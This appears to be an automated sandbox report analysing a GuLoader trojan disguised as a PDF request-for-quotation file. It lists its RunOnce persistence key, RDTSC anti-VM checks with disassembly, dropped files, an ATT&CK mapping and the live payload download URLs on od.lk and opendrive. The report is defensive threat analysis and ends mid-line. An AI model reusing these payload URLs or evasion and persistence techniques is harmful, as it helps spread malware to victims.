        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Rhinskvinsglassets
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Befolkningsgruppe (4 occurrences)
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe Process information set: NOOPENFILEERRORBOX (9 occurrences)
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 occurrences)
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (51 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe Process information set: NOOPENFILEERRORBOX (9 occurrences)
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (3 occurrences)
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (43 occurrences)

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe API/Special instruction interceptor: Address: 5EA7F49
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe API/Special instruction interceptor: Address: 22C7F49
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe API/Special instruction interceptor: Address: 5EA7F49
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe API/Special instruction interceptor: Address: 22C7F49
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe RDTSC instruction interceptor: First address: 5E51EE9 second address: 5E51EE9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 cmp esi, 27BA7437h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F646C5233ADh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 test si, 78A6h 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe RDTSC instruction interceptor: First address: 2271EE9 second address: 2271EE9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 cmp esi, 27BA7437h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F646CC2BB2Dh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 test si, 78A6h 0x00000015 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe RDTSC instruction interceptor: First address: 5E51EE9 second address: 5E51EE9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 cmp esi, 27BA7437h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F646C5233ADh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 test si, 78A6h 0x00000015 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe RDTSC instruction interceptor: First address: 2271EE9 second address: 2271EE9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 cmp esi, 27BA7437h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F646CC2BB2Dh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 test si, 78A6h 0x00000015 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp52FE.tmp\System.dll
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl4A68.tmp\System.dll
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe TID: 7968 Thread sleep count: 70 > 30
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe TID: 1772 Thread sleep count: 70 > 30
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe Code function: 0_2_00405FE2 FindFirstFileA,FindClose,0_2_00405FE2
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe Code function: 0_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559E
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe Code function: 0_2_00402645 FindFirstFileA,0_2_00402645
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe Code function: 4_2_00402645 FindFirstFileA,4_2_00402645
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe Code function: 4_2_00405FE2 FindFirstFileA,FindClose,4_2_00405FE2
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe Code function: 4_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_0040559E
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe File opened: C:\Users\user
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe File opened: C:\Users\user\Documents\desktop.ini
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe File opened: C:\Users\user\AppData
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe File opened: C:\Users\user\AppData\Local\Temp
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe File opened: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe File opened: C:\Users\user\AppData\Local
        Source: Amcache.hve.7.dr Binary or memory string: VMware
        Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
        Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
        Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
        Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.000000000381F000.00000004.00000020.00020000.00000000.sdmp, RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994620111.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.0000000003668000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
        Source: Amcache.hve.7.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
        Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
        Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAM
        Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-4388
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-4390
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406009
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess created: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe "C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess created: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe "C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe" Jump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_00405D00 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D00
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior
        Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
MITRE ATT&CK Matrix (one line per tactic column; the number in parentheses is the signature count the report attaches to that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: Registry Run Keys / Startup Folder (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (11); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (3); Virtualization/Sandbox Evasion (1); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (311); Virtualization/Sandbox Evasion (1); File and Directory Discovery (4); System Information Discovery (24); Internet Connection Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Endpoint Denial of Service (1); System Shutdown/Reboot (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID 1617166, sample RFQ_SRC02252017-pdf.scr.exe, start date 17/02/2025, architecture WINDOWS, score 96), information recovered from the graph export:

• Top-level signatures: Multi AV Scanner detection for submitted file; Yara detected GuLoader; Sigma detected: New RUN Key Pointing to Suspicious Folder; 2 other signatures. Contacted domains: web.opendrive.com, od.lk.
• RFQ_SRC02252017-pdf.scr.exe started. Dropped: C:\Users\user\AppData\...\minirobot.uni (DOS); C:\Users\user\AppData\Local\...\System.dll (PE32); C:\Users\user\...\microminiaturise.exe (PE32). Signatures: Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces. It started a second RFQ_SRC02252017-pdf.scr.exe, which connected to od.lk (38.108.185.115, 443, 49759, 50013, COGENT-174US, United States) and web.opendrive.com (38.108.185.71, 443, 49765, 50014, COGENT-174US, United States); signature: Increases the number of concurrent connection per server for Internet Explorer. WerFault.exe then started.
• microminiaturise.exe started. Dropped: C:\Users\user\AppData\Local\...\System.dll (PE32). Signature: Multi AV Scanner detection for dropped file. It started a second microminiaturise.exe, after which WerFault.exe started.

Source | Detection | Scanner | Label
RFQ_SRC02252017-pdf.scr.exe | 27% | ReversingLabs | Win32.Trojan.NsisInject
RFQ_SRC02252017-pdf.scr.exe | 38% | Virustotal |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | 27% | ReversingLabs | Win32.Trojan.NsisInject
C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe | 38% | Virustotal |
C:\Users\user\AppData\Local\Temp\nsl4A68.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsl4A68.tmp\System.dll | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\nsp52FE.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsp52FE.tmp\System.dll | 0% | Virustotal |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\minirobot.uni | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernes\kmpernes\Trkloset\Raahusenes\minirobot.uni | 0% | Virustotal |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
od.lk | 38.108.185.115 | true | false | | high
web.opendrive.com | 38.108.185.71 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://od.lk/d/MzdfMzIyNjM2NDFf/DgaYM84.bin | false | | high
https://web.opendrive.com/api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0E%06%983%CE%1B%8A&inline=0 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://od.lk/z | microminiaturise.exe, 0000000A.00000003.2994620111.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036B7000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://web.opendrive.com/api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0~ | microminiaturise.exe, 0000000A.00000002.3338788769.00000000036A2000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://od.lk/ | RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994620111.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036B7000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://web.opendrive.com/4 | microminiaturise.exe, 0000000A.00000003.2959967361.0000000003701000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | RFQ_SRC02252017-pdf.scr.exe, microminiaturise.exe.0.dr | false | | high
https://od.lk/J~Z_ | RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.00000000037C8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://web.opendrive.com/aut | microminiaturise.exe, 0000000A.00000003.2959967361.0000000003701000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://web.opendrive.com/E | RFQ_SRC02252017-pdf.scr.exe, 00000004.00000003.2316123890.0000000003833000.00000004.00000020.00020000.00000000.sdmp, RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.0000000003833000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://web.opendrive.com/LMEM | RFQ_SRC02252017-pdf.scr.exe, 00000004.00000003.2304965874.0000000003838000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.7.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | RFQ_SRC02252017-pdf.scr.exe, microminiaturise.exe.0.dr | false | | high
https://web.opendrive.com/api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0E%06%983%CE%1B%8A&in | microminiaturise.exe, 0000000A.00000003.2959967361.0000000003701000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994509172.0000000003701000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994620111.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036B7000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://web.opendrive.com/ | microminiaturise.exe, 0000000A.00000003.2994509172.0000000003701000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://web.opendrive.com/u | RFQ_SRC02252017-pdf.scr.exe, 00000004.00000003.2304965874.0000000003838000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
38.108.185.71 | web.opendrive.com | United States | 174 | COGENT-174US | false
38.108.185.115 | od.lk | United States | 174 | COGENT-174US | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1617166
Start date and time: 2025-02-17 15:48:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ_SRC02252017-pdf.scr.exe
Detection: MAL
Classification: mal96.phis.troj.evad.winEXE@8/26@3/2
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 81%
• Number of executed functions: 55
• Number of non-executed functions: 73
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.208.16.94, 52.168.117.173, 20.109.210.53, 13.107.246.45, 40.126.32.136
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Execution Graph export aborted for target RFQ_SRC02252017-pdf.scr.exe, PID 7724 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
14:50:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Befolkningsgruppe C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe
14:51:07 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Befolkningsgruppe C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
38.108.185.71 | HEUR-Backdoor.MSIL.Crysan.gen-4b7c7ecab6728bb.exe | malicious | AsyncRAT, Clipboard Hijacker |
38.108.185.115 | rAE09579G0033855AEDXBFFHHHHJ-VC.exe | malicious | Remcos |
 | rAE09579Q0033388AEDXB1092.exe | malicious | Remcos, GuLoader |
 | r000_ScannedwithXeroxMultifunctionPrinter.exe | malicious | Remcos, GuLoader |
 | rELITETRADINGLL.exe | malicious | Remcos, GuLoader |
 | rquotation.exe | malicious | Remcos, GuLoader |
 | Ld3pkWLjgX.exe | malicious | AsyncRAT, GuLoader |
 | https://od.lk/f/NjNfMjQ2Mjc1OTRf | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
od.lk | rAE09579G0033855AEDXBFFHHHHJ-VC.exe | malicious | Remcos | 38.108.185.115
 | rAE09579Q0033388AEDXB1092.exe | malicious | Remcos, GuLoader | 38.108.185.115
 | r000_ScannedwithXeroxMultifunctionPrinter.exe | malicious | Remcos, GuLoader | 38.108.185.115
 | rELITETRADINGLL.exe | malicious | Remcos, GuLoader | 38.108.185.115
 | rquotation.exe | malicious | Remcos, GuLoader | 38.108.185.115
 | Ld3pkWLjgX.exe | malicious | AsyncRAT, GuLoader | 38.108.185.115
 | https://od.lk/s/OTRfODM3MjM2NzVf/La_dichiarazione_precompilata_2024.pdf | malicious | Unknown | 184.105.177.70
 | purchae order notification!!!purchae order notification!!!.exe | malicious | AgentTesla | 38.108.185.79
 | https://od.lk/f/NjNfMjQ2Mjc1OTRf | malicious | Unknown | 38.108.185.115
web.opendrive.com | rAE09579G0033855AEDXBFFHHHHJ-VC.exe | malicious | Remcos | 38.108.185.67
 | rAE09579Q0033388AEDXB1092.exe | malicious | Remcos, GuLoader | 38.108.185.65
 | r000_ScannedwithXeroxMultifunctionPrinter.exe | malicious | Remcos, GuLoader | 38.108.185.69
 | rELITETRADINGLL.exe | malicious | Remcos, GuLoader | 38.108.185.63
 | rquotation.exe | malicious | Remcos, GuLoader | 38.108.185.68
 | Ld3pkWLjgX.exe | malicious | AsyncRAT, GuLoader | 38.108.185.65
 | https://od.lk/s/OTRfODM3MjM2NzVf/La_dichiarazione_precompilata_2024.pdf | malicious | Unknown | 184.105.177.74
 | HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exe | malicious | LimeRAT | 184.105.177.72
 | HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exe | malicious | LimeRAT | 184.105.177.77
Match | Associated Sample Name / URL | Detection | Threat Name | Context
COGENT-174US | Hilix.spc.elf | malicious | Mirai | 38.184.96.227
 | PO240145.exe | malicious | FormBook | 38.11.157.207
 | QUOTATION NO REQ-19-000640.exe | malicious | FormBook | 38.11.157.207
 | armv6l.elf | malicious | Unknown | 38.37.11.80
 | rAE09579G0033855AEDXBFFHHHHJ-VC.exe | malicious | Remcos | 38.108.185.115
                                                            rAE09579Q0033388AEDXB1092.exeGet ha